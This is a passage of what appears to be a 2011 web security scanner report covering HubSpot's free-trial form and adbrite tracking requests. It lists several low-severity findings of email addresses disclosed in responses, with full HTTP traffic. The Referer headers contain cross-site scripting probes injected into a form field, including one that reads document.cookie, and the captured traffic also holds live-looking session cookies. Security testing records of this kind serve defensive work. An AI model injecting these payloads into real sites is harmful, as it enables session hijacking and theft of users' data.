DAwMCIgd2lkdGg9IjIwMCIgaGVpZ2h0PSIxMzciIGNvZGViYXNlPSJodHRwOi8vZG93bmxvYWQubWFjcm9tZWRpYS5jb20vcHViL3Nob2Nrd2F2ZS9jYWJzL2ZsYXNoL3N3Zmxhc2guY2FiI3ZlcnNpb249NiwwLDQwLDAiPgo8cGFyYW0gbmFtZT0iYWxsb3dGdWxsU2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz4KPHBhcmFtIG5hbWU9ImFsbG93c2NyaXB0YWNjZXNzIiB2YWx1ZT0iYWx3YXlzIiAvPgo8cGFyYW0gbmFtZT0ic3JjIiB2YWx1ZT0iaHR0cDovL3d3dy55b3V0dWJlLmNvbS92L20wVVF1Y1dNMFp3P2ZzPTEmYW1wO2hsPWVuX1VTIiAvPgo8cGFyYW0gbmFtZT0iYWxsb3dmdWxsc2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz48ZW1iZWQgc3R5bGU9ImRpc3BsYXk6IGJsb2NrOyBtYXJnaW4tbGVmdDogYXV0bzsgbWFyZ2luLXJpZ2h0OiBhdXRvOyIgdHlwZT0iYXBwbGljYXRpb24veC1zaG9ja3dhdmUtZmxhc2giIHdpZHRoPSIyMDAiIGhlaWdodD0iMTM3IiBzcmM9Imh0dHA6Ly93d3cueW91dHViZS5jb20vdi9tMFVRdWNXTTBadz9mcz0xJmFtcDtobD1lbl9VUyIgYWxsb3dzY3JpcHRhY2Nlc3M9ImFsd2F5cyIgYWxsb3dmdWxsc2NyZWVuPSJ0cnVlIj48L2VtYmVkPgo8L29iamVjdD5kAgEPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAWwBTxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPkh1YlNwb3QgaXMgY29tbWl0dGVkIHRvIG1ha2luZyBvdXIgY3VzdG9tZXJzIHN1Y2Nlc3NmdWwgd2l0aCBpbmJvdW5kIG1hcmtldGluZy4gQnV0IEh1YlNwb3QgaXNuJ3QgcmlnaHQgZm9yIGV2ZXJ5b25lLiA8YnIgLz48YnIgLz5Zb3UgcXVhbGlmeSBmb3IgYSBIdWJTcG90IHRyaWFsIGlmOjxiciAvPjxiciAvPiA8c3Ryb25nPio8L3N0cm9uZz4gVGhlIGdvYWwgb2YgeW91ciB3ZWJzaXRlIGlzIHRvIDxzdHJvbmc%2bZ2VuZXJhdGUgbGVhZHM8L3N0cm9uZz4gZm9yIHlvdXIgYnVzaW5lc3MuPGJyIC8%2bPGJyIC8%2bIDxzdHJvbmc%2bKjwvc3Ryb25nPiBZb3Ugd2FudCB0byB0YWtlIG9uIEludGVybmV0IG1hcmtldGluZyB5b3Vyc2VsZiwgYW5kIGhhdmUgPHN0cm9uZz50aW1lIGFuZCByZXNvdXJjZXM8L3N0cm9uZz4gc2V0IGFzaWRlIGZvciB0aGlzIHB1cnBvc2UuPC9wPgo8L2Rpdj5kAgIPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAX1BDxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPjxlbT4iU2luY2Ugc3RhcnRpbmcgd2l0aCBIdWJTcG90LCA8c3Ryb25nPndlYnNpdGUgdHJhZmZpYyBoYXMgbW9yZSB0aGFuIGRvdWJsZWQgPC9zdHJvbmc%2bZnJvbSA1MDAgdmlzaXRvcnMgcGVyIG1vbnRoIHRvIG92ZXIgMTAwMCwgPHN0cm9uZz5hbmQgPC9zdHJvbmc%2bPHN0cm9uZz5JIGhhdmUgYWxyZWFkeSBnZW5lcmF0ZWQgYSBudW1iZXIgb2YgbGVhZHMgdGhhdCBwYXkgZm9yIEh1YlNwb3QgMzAgdGltZXMgb3Zlci4iIDwvc3Ryb25nPjwvZW0%2bPC9wPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTNweDsiPjxlbT4tTm9lbCBIdWVsc2VuYmVjaywgUHJlc2lkZW50LCBWb2NpbyA8L2VtPjwvcD4KPC9kaXY%2bZAIED2QWAmYPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAXIBzxoND5PcHRpbWl6ZSB5b3VyIHdlYnNpdGUgdG8gPHN0cm9uZz5nZXQgZm91bmQ8L3N0cm9uZz4gYnkgbW9yZSBwcm9zcGVjdHMgYW5kIDxzdHJvbmc%2bY29udmVydCA8L3N0cm9uZz4gbW9yZSBvZiB0aGVtIGludG8gPHN0cm9uZz5sZWFkcyBhbmQgcGF5aW5nIGN1c3RvbWVyczwvc3Ryb25nPiB3aXRoIEh1YlNwb3QncyBpbmJvdW5kICBtYXJrZXRpbmcgc29mdHdhcmUuPC9oND4KPHA%2bPHN0cm9uZz4gPGltZyBzcmM9Ii9Qb3J0YWxzLzUzL2ltYWdlcy9IdWJTcG90X1NvZnR3YXJlLnBuZyIgYm9yZGVyPSIwIiBhbHQ9Ikh1YlNwb3QgU29mdHdhcmUiIGhzcGFjZT0iMCIgdnNwYWNlPSIwIiBjbGFzcz0iYWxpZ25SaWdodCIgc3R5bGU9ImZsb2F0OiByaWdodDsiIC8%2bPGJyIC8%2bWW91ciBGcmVlIFRyaWFsIG9mIEh1YlNwb3Q6IDwvc3Ryb25nPjwvcD4KPHVsPgo8bGk%2bR2l2ZXMgeW91IHRvb2xzIHRvIDxlbT5nZXQgZm91bmQgb25saW5lPC9lbT4gYnkgbW9yZSBxdWFsaWZpZWQgdmlzaXRvcnMuPC9saT4KPGxpPlNob3dzIHlvdSBob3cgdG8gPGVtPmNvbnZlcnQgbW9yZTwvZW0%2bIHZpc2l0b3JzIGludG8gbGVhZHMuPC9saT4KPGxpPkdpdmVzIHlvdSB0b29scyB0byA8ZW0%2bY2xvc2UgdGhvc2UgbGVhZHMgZWZmaWNpZW50bHk8L2VtPi48L2xpPgo8bGk%2bUHJvdmlkZXMgYW5hbHl0aWNzIHRvIGhlbHAgeW91IG08ZW0%2bYWtlIHNtYXJ0IG1hcmtldGluZyBpbnZlc3RtZW50czwvZW0%2bLjwvbGk%2bCjwvdWw%2bCjx1bD4KPC91bD4KPHA%2bPGJyIC8%2bWW91ciBmcmVlIHRyaWFsIGdpdmVzIHlvdSBhY2Nlc3MgdG8gYWxsIG9mIEh1YlNwb3QncyB0b29scyBhbmQgY3VzdG9tZXItb25seSByZXNvdXJjZXMuPC9wPgo8cD5UaGVyZSdzIDxzdHJvbmc%2bbm8gcmlzazwvc3Ryb25nPiwgPHN0cm9uZz5ubyBvYmxpZ2F0aW9uPC9zdHJvbmc%2bLCBhbmQgPHN0cm9uZz5ubyBjcmVkaXQgY2FyZDwvc3Ryb25nPiByZXF1aXJlZC48L3A%2bZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUVZG5uOklOR0VOSU1FTlUxOl9jdGwwIKoaNbs8%2flwSOS5lpqE0UiyhZtU%3d&dnn%3aINGENIMENU1%3a_ctl0=%0d&LeadGen_ContactForm_10273_m66219submitter_user_token=a3ef224db6434804a3e24ca05d84f49f&ContactFormId=10273&LeadGen_ContactForm_10273_m66219spam_check_key=jggksnhejohgplhhsqookmjojleogkigfklmeindumpwrhjglwdiswdwrthh&LeadGen_ContactForm_10273_m66219spam_check_sig=119116116120128123117114119124117116125121117117128126124124120122119124119121114124116120118116115120121122114118123113130122125132127117119116121132113118128132113132127129117117&LeadGen_ContactForm_10273_m66219%3aFirstName=%0d&LeadGen_ContactForm_10273_m66219%3aLastName=%0d&LeadGen_ContactForm_10273_m66219%3aEmail=%0d&LeadGen_ContactForm_10273_m66219%3aPhone=%0d&LeadGen_ContactForm_10273_m66219%3aCompany=%0d&LeadGen_ContactForm_10273_m66219%3aWebsite=%0d&LeadGen_ContactForm_10273_m66219%3aB2B_vs_B2C_PRELIM__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aEmployees__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aRole__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aMarketing_Company_auto__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aBiggest_Marketing_Challenge__c=%0d16368%3cscript%3ealert%28%22DORK%22%29%3c%2fscript%3e396df5a84505c6ed9&LeadGen_ContactForm_Submit_LeadGen_ContactForm_10273_m66219=Start+Your+Free+Trial+Now&ScrollTop=%0d&__dnnVariable=%0d&hsFirstVisitHidden=http%25253A%25252F%25252Fwww.hubspot.com%25252Febooks%25252Ffacebook-page-marketing-ebook-2011%25252F%25253Fsource%25253Dhspd-InsideFacebook-200x200ad-201104%257chttp%25253A%25252F%25252Fwww.insidefacebook.com%25252F%257c2011-05-15%25252012%25253A53%25253A12
Cookie: Apache="168362123x0.728+1302188608x-1818389268"; ut="1%3ALc1LCoAgFEDRvbxxgwwyaTeWhn00UyrM594ra3o5cCMcFbQRZhnO1QkPLfRqoWOgMiBxhBmGBMvCl0o3SGxPF5%2FDr4Y6q3X7FNNBPIFb4bDC%2FVf1dGVl1auggI4bI92Yd5DSDQ%3D%3D"; rb2=CiMKBjc0MjY5NxiAvsP4DiITMzY1ODE5NTk2NjAyOTQxNzk3MAouCgY3NjI3MDEY2uORrBYiHkUzRjMyQkQwOTU0NkM5NERBRDk1RDFCNTQwMTEwQxAB; rb=0:742697:20828160:3658195966029417970:0:762701:20861280:E3F32BD09546C94DAD95D1B540110C:0; srh="1%3Aq64FAA%3D%3D"; vsd=0@2@4dd006cf@www.hubspot.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: ut="1%3ALc1NDkAwEEDhu8zawhDVuI2fStFWtQmpjrujbF%2B%2B5EXYC2giLCIcqxs8NNBLxabARCB0yA0npDzzudQ1oe2Z8in8aqySWrdPcR2GJ7RWWCoJ%2Fc%2Bq%2BUzMypdBBl1rjHBT%2BsF13Q%3D%3D"; path=/; domain=.adbrite.com; expires=Wed, 12-May-2021 17:01:37 GMT
Set-Cookie: vsd=0@3@4dd006f1@www.hubspot.com; path=/; domain=.adbrite.com; expires=Tue, 17-May-2011 17:01:37 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sun, 15 May 2011 17:01:37 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

19.2. http://bstats.adbrite.com/click/bstats.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bstats.adbrite.com
Path:	/click/bstats.gif

Issue detail

The following email address was disclosed in the response:

4dd006b1@www.hubspot.com

Request

GET /click/bstats.gif?kid=47432245&bapid=10434&uid=680833 HTTP/1.1
Host: bstats.adbrite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/free-trial/Default.aspx?RewriteStatus=1&__VIEWSTATE=%2fwEPDwULLTEyNDEwNzkwMjkPZBYGZg8WAh4EVGV4dAUPPCFET0NUWVBFIGh0bWw%2bZAIBD2QWDgIBDxYCHgdWaXNpYmxlaGQCAg8WAh4HY29udGVudAVvR2V0IGEgZnJlZSB0cmlhbCBvZiB0aGUgSHViU3BvdCBpbmJvdW5kIG1hcmtldGluZyBzb2Z0d2FyZSB0byBoZWxwIGdlbmVyYXRlIG1vcmUgdmlzaXRvcnMsIGxlYWRzIGFuZCBjdXN0b21lcnMuZAIDDxYCHwJkZAIEDxYCHwIFFkNvcHlyaWdodCAoYykgMjAxMSBieSBkAgUPFgIfAgUISHViU3BvdCBkAgYPFgIfAmRkAg8PFgIfAAWoBDxsaW5rIHJlbD0iYWx0ZXJuYXRlIiB0eXBlPSJhcHBsaWNhdGlvbi9yc3MreG1sIiB0aXRsZT0iSHViU3BvdCBDb21wYW55ICZhbXA7YW1wJiN4M2I7IFByb2R1Y3QgTmV3cyBCbG9nIiBocmVmPSJodHRwJiN4M2E7JiN4MmY7JiN4MmY7d3d3Lmh1YnNwb3QuY29tJiN4MmY7Q01TJiN4MmY7VUkmI3gyZjtNb2R1bGVzJiN4MmY7Qml6QmxvZ2dlciYjeDJmO3Jzcy5hc3B4JiN4M2Y7dGFiaWQmI3gzZDs4NTc2JmFtcDttb2R1bGVpZCYjeDNkOzEwMTE2JmFtcDttYXhjb3VudCYjeDNkOzI1Ii8%2bDQo8bGluayByZWw9ImFsdGVybmF0ZSIgdHlwZT0iYXBwbGljYXRpb24vcnNzK3htbCIgdGl0bGU9Ikh1YlNwb3QgSW50ZXJuZXQgTWFya2V0aW5nIENhc2UgU3R1ZGllcyIgaHJlZj0iaHR0cCYjeDNhOyYjeDJmOyYjeDJmO3d3dy5odWJzcG90LmNvbSYjeDJmO0NNUyYjeDJmO1VJJiN4MmY7TW9kdWxlcyYjeDJmO0JpekJsb2dnZXImI3gyZjtyc3MuYXNweCYjeDNmO3RhYmlkJiN4M2Q7NTg2NjgmYW1wO21vZHVsZWlkJiN4M2Q7NDQ4ODcmYW1wO21heGNvdW50JiN4M2Q7MjUiLz4NCmQCAg9kFgICAw9kFgICAw9kFgICAQ9kFgQCAw9kFgZmD2QWAgIED2QWAmYPZBYCZg9kFgJmDxYCHwAF3AU8b2JqZWN0IHN0eWxlPSJkaXNwbGF5OiBibG9jazsgbWFyZ2luLWxlZnQ6IGF1dG87IG1hcmdpbi1yaWdodDogYXV0bzsiIGNsYXNzaWQ9ImNsc2lkOmQyN2NkYjZlLWFlNmQtMTFjZi05NmI4LTQ0NDU1MzU0MDAwMCIgd2lkdGg9IjIwMCIgaGVpZ2h0PSIxMzciIGNvZGViYXNlPSJodHRwOi8vZG93bmxvYWQubWFjcm9tZWRpYS5jb20vcHViL3Nob2Nrd2F2ZS9jYWJzL2ZsYXNoL3N3Zmxhc2guY2FiI3ZlcnNpb249NiwwLDQwLDAiPgo8cGFyYW0gbmFtZT0iYWxsb3dGdWxsU2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz4KPHBhcmFtIG5hbWU9ImFsbG93c2NyaXB0YWNjZXNzIiB2YWx1ZT0iYWx3YXlzIiAvPgo8cGFyYW0gbmFtZT0ic3JjIiB2YWx1ZT0iaHR0cDovL3d3dy55b3V0dWJlLmNvbS92L20wVVF1Y1dNMFp3P2ZzPTEmYW1wO2hsPWVuX1VTIiAvPgo8cGFyYW0gbmFtZT0iYWxsb3dmdWxsc2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz48ZW1iZWQgc3R5bGU9ImRpc3BsYXk6IGJsb2NrOyBtYXJnaW4tbGVmdDogYXV0bzsgbWFyZ2luLXJpZ2h0OiBhdXRvOyIgdHlwZT0iYXBwbGljYXRpb24veC1zaG9ja3dhdmUtZmxhc2giIHdpZHRoPSIyMDAiIGhlaWdodD0iMTM3IiBzcmM9Imh0dHA6Ly93d3cueW91dHViZS5jb20vdi9tMFVRdWNXTTBadz9mcz0xJmFtcDtobD1lbl9VUyIgYWxsb3dzY3JpcHRhY2Nlc3M9ImFsd2F5cyIgYWxsb3dmdWxsc2NyZWVuPSJ0cnVlIj48L2VtYmVkPgo8L29iamVjdD5kAgEPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAWwBTxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPkh1YlNwb3QgaXMgY29tbWl0dGVkIHRvIG1ha2luZyBvdXIgY3VzdG9tZXJzIHN1Y2Nlc3NmdWwgd2l0aCBpbmJvdW5kIG1hcmtldGluZy4gQnV0IEh1YlNwb3QgaXNuJ3QgcmlnaHQgZm9yIGV2ZXJ5b25lLiA8YnIgLz48YnIgLz5Zb3UgcXVhbGlmeSBmb3IgYSBIdWJTcG90IHRyaWFsIGlmOjxiciAvPjxiciAvPiA8c3Ryb25nPio8L3N0cm9uZz4gVGhlIGdvYWwgb2YgeW91ciB3ZWJzaXRlIGlzIHRvIDxzdHJvbmc%2bZ2VuZXJhdGUgbGVhZHM8L3N0cm9uZz4gZm9yIHlvdXIgYnVzaW5lc3MuPGJyIC8%2bPGJyIC8%2bIDxzdHJvbmc%2bKjwvc3Ryb25nPiBZb3Ugd2FudCB0byB0YWtlIG9uIEludGVybmV0IG1hcmtldGluZyB5b3Vyc2VsZiwgYW5kIGhhdmUgPHN0cm9uZz50aW1lIGFuZCByZXNvdXJjZXM8L3N0cm9uZz4gc2V0IGFzaWRlIGZvciB0aGlzIHB1cnBvc2UuPC9wPgo8L2Rpdj5kAgIPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAX1BDxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPjxlbT4iU2luY2Ugc3RhcnRpbmcgd2l0aCBIdWJTcG90LCA8c3Ryb25nPndlYnNpdGUgdHJhZmZpYyBoYXMgbW9yZSB0aGFuIGRvdWJsZWQgPC9zdHJvbmc%2bZnJvbSA1MDAgdmlzaXRvcnMgcGVyIG1vbnRoIHRvIG92ZXIgMTAwMCwgPHN0cm9uZz5hbmQgPC9zdHJvbmc%2bPHN0cm9uZz5JIGhhdmUgYWxyZWFkeSBnZW5lcmF0ZWQgYSBudW1iZXIgb2YgbGVhZHMgdGhhdCBwYXkgZm9yIEh1YlNwb3QgMzAgdGltZXMgb3Zlci4iIDwvc3Ryb25nPjwvZW0%2bPC9wPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTNweDsiPjxlbT4tTm9lbCBIdWVsc2VuYmVjaywgUHJlc2lkZW50LCBWb2NpbyA8L2VtPjwvcD4KPC9kaXY%2bZAIED2QWAmYPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAXIBzxoND5PcHRpbWl6ZSB5b3VyIHdlYnNpdGUgdG8gPHN0cm9uZz5nZXQgZm91bmQ8L3N0cm9uZz4gYnkgbW9yZSBwcm9zcGVjdHMgYW5kIDxzdHJvbmc%2bY29udmVydCA8L3N0cm9uZz4gbW9yZSBvZiB0aGVtIGludG8gPHN0cm9uZz5sZWFkcyBhbmQgcGF5aW5nIGN1c3RvbWVyczwvc3Ryb25nPiB3aXRoIEh1YlNwb3QncyBpbmJvdW5kICBtYXJrZXRpbmcgc29mdHdhcmUuPC9oND4KPHA%2bPHN0cm9uZz4gPGltZyBzcmM9Ii9Qb3J0YWxzLzUzL2ltYWdlcy9IdWJTcG90X1NvZnR3YXJlLnBuZyIgYm9yZGVyPSIwIiBhbHQ9Ikh1YlNwb3QgU29mdHdhcmUiIGhzcGFjZT0iMCIgdnNwYWNlPSIwIiBjbGFzcz0iYWxpZ25SaWdodCIgc3R5bGU9ImZsb2F0OiByaWdodDsiIC8%2bPGJyIC8%2bWW91ciBGcmVlIFRyaWFsIG9mIEh1YlNwb3Q6IDwvc3Ryb25nPjwvcD4KPHVsPgo8bGk%2bR2l2ZXMgeW91IHRvb2xzIHRvIDxlbT5nZXQgZm91bmQgb25saW5lPC9lbT4gYnkgbW9yZSBxdWFsaWZpZWQgdmlzaXRvcnMuPC9saT4KPGxpPlNob3dzIHlvdSBob3cgdG8gPGVtPmNvbnZlcnQgbW9yZTwvZW0%2bIHZpc2l0b3JzIGludG8gbGVhZHMuPC9saT4KPGxpPkdpdmVzIHlvdSB0b29scyB0byA8ZW0%2bY2xvc2UgdGhvc2UgbGVhZHMgZWZmaWNpZW50bHk8L2VtPi48L2xpPgo8bGk%2bUHJvdmlkZXMgYW5hbHl0aWNzIHRvIGhlbHAgeW91IG08ZW0%2bYWtlIHNtYXJ0IG1hcmtldGluZyBpbnZlc3RtZW50czwvZW0%2bLjwvbGk%2bCjwvdWw%2bCjx1bD4KPC91bD4KPHA%2bPGJyIC8%2bWW91ciBmcmVlIHRyaWFsIGdpdmVzIHlvdSBhY2Nlc3MgdG8gYWxsIG9mIEh1YlNwb3QncyB0b29scyBhbmQgY3VzdG9tZXItb25seSByZXNvdXJjZXMuPC9wPgo8cD5UaGVyZSdzIDxzdHJvbmc%2bbm8gcmlzazwvc3Ryb25nPiwgPHN0cm9uZz5ubyBvYmxpZ2F0aW9uPC9zdHJvbmc%2bLCBhbmQgPHN0cm9uZz5ubyBjcmVkaXQgY2FyZDwvc3Ryb25nPiByZXF1aXJlZC48L3A%2bZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUVZG5uOklOR0VOSU1FTlUxOl9jdGwwIKoaNbs8%2flwSOS5lpqE0UiyhZtU%3d&dnn%3aINGENIMENU1%3a_ctl0=%0d&LeadGen_ContactForm_10273_m66219submitter_user_token=a3ef224db6434804a3e24ca05d84f49f&ContactFormId=10273&LeadGen_ContactForm_10273_m66219spam_check_key=jggksnhejohgplhhsqookmjojleogkigfklmeindumpwrhjglwdiswdwrthh&LeadGen_ContactForm_10273_m66219spam_check_sig=119116116120128123117114119124117116125121117117128126124124120122119124119121114124116120118116115120121122114118123113130122125132127117119116121132113118128132113132127129117117&LeadGen_ContactForm_10273_m66219%3aFirstName=%0d&LeadGen_ContactForm_10273_m66219%3aLastName=%0d&LeadGen_ContactForm_10273_m66219%3aEmail=%0d&LeadGen_ContactForm_10273_m66219%3aPhone=%0d&LeadGen_ContactForm_10273_m66219%3aCompany=%0d&LeadGen_ContactForm_10273_m66219%3aWebsite=%0d&LeadGen_ContactForm_10273_m66219%3aB2B_vs_B2C_PRELIM__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aEmployees__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aRole__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aMarketing_Company_auto__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aBiggest_Marketing_Challenge__c=%0d16368%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e396df5a84505c6ed9&LeadGen_ContactForm_Submit_LeadGen_ContactForm_10273_m66219=Start+Your+Free+Trial+Now&ScrollTop=%0d&__dnnVariable=%0d&hsFirstVisitHidden=http%25253A%25252F%25252Fwww.hubspot.com%25252Febooks%25252Ffacebook-page-marketing-ebook-2011%25252F%25253Fsource%25253Dhspd-InsideFacebook-200x200ad-201104%257chttp%25253A%25252F%25252Fwww.insidefacebook.com%25252F%257c2011-05-15%25252012%25253A53%25253A12
Cookie: Apache="168362123x0.728+1302188608x-1818389268"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyDHLrDRLrawxLDK0yLOoMawx0Ck2yMg1rzEsSDbLKQYLQFWlmYJV5RciCZpmVYEFCzJAgko6SkmJeXmpRZlg05VqawE%3D"; rb2=CiMKBjc0MjY5NxiAvsP4DiITMzY1ODE5NTk2NjAyOTQxNzk3MAouCgY3NjI3MDEY2uORrBYiHkUzRjMyQkQwOTU0NkM5NERBRDk1RDFCNTQwMTEwQxAB; rb=0:742697:20828160:3658195966029417970:0:762701:20861280:E3F32BD09546C94DAD95D1B540110C:0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Mon, 16-May-2011 17:00:33 GMT
Set-Cookie: ut="1%3ATc1LCoAgFEDRvbyxgww0cTdlhn00U6hM23tlDZpeDtwIawk8wijDNrvWAwehJtoHKkPCDjPDEk4F8oXSVcJW0Mnn8KmOZDUvr2I6tHeordh%2FigxHVlY9ERA0tTHS9XkH53kB"; path=/; domain=.adbrite.com; expires=Wed, 12-May-2021 17:00:33 GMT
Set-Cookie: vsd=0@1@4dd006b1@www.hubspot.com; path=/; domain=.adbrite.com; expires=Tue, 17-May-2011 17:00:33 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sun, 15 May 2011 17:00:33 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

19.3. http://bstats.adbrite.com/click/bstats.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bstats.adbrite.com
Path:	/click/bstats.gif

Issue detail

The following email address was disclosed in the response:

4dd0054f@www.hubspot.com

Request

GET /click/bstats.gif?kid=47432245&bapid=10434&uid=680833 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/free-trial/Default.aspx?RewriteStatus=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; srh="1%3Aq64FAA%3D%3D"; rb2=EAE; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUiq2yK1MrDEsSiwwKK8xrDFQ0lFKSszLSy3KBEsr1dYCAA%3D%3D"; vsd=0@1@4dd00500@www.hubspot.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUiq2yK1MqTEsSiwwNq4xrDHQAQkkggUMykECSjpKSYl5ealFmWD1SrW1AA%3D%3D"; path=/; domain=.adbrite.com; expires=Wed, 12-May-2021 16:54:39 GMT
Set-Cookie: vsd=0@2@4dd0054f@www.hubspot.com; path=/; domain=.adbrite.com; expires=Tue, 17-May-2011 16:54:39 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sun, 15 May 2011 16:54:39 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

19.4. http://bstats.adbrite.com/click/bstats.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bstats.adbrite.com
Path:	/click/bstats.gif

Issue detail

The following email address was disclosed in the response:

4dd006cf@www.hubspot.com

Request

GET /click/bstats.gif?kid=47432245&bapid=10434&uid=680833 HTTP/1.1
Host: bstats.adbrite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
